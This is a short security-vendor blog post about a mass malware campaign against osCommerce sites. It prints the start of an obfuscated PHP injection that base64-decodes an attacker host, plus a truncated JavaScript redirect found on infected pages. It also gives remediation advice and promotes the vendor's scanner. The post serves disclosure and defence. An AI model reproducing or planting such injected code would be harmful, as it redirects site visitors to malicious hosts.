Continuing attacks against osCommerce:

Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to This is how it looks like in an infected site:

<script type="text/javascript">document.location = "…..tL2FkbWluLw=="

This javascript is generated by the following code added to the bottom of all PHP files in the server:

<?php if(!isset($tf[‘engine’])){$tf[‘engine’]=1;$tf[‘s’]=base64_decode(‘a2hjb2wuY29t’);$tf[‘u’]=’http://’.$tf[‘s’]…

We recommend that every osCommerce user check their sites and to take the proper steps to secure them (especially if using v2.2). The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our malware scanner to verify if a site is infected. If it is, we can take care of it for you.

Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon.

Update 2: Other domains being used in this attack:,,, and many others.

We will post more details as we track this malware.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.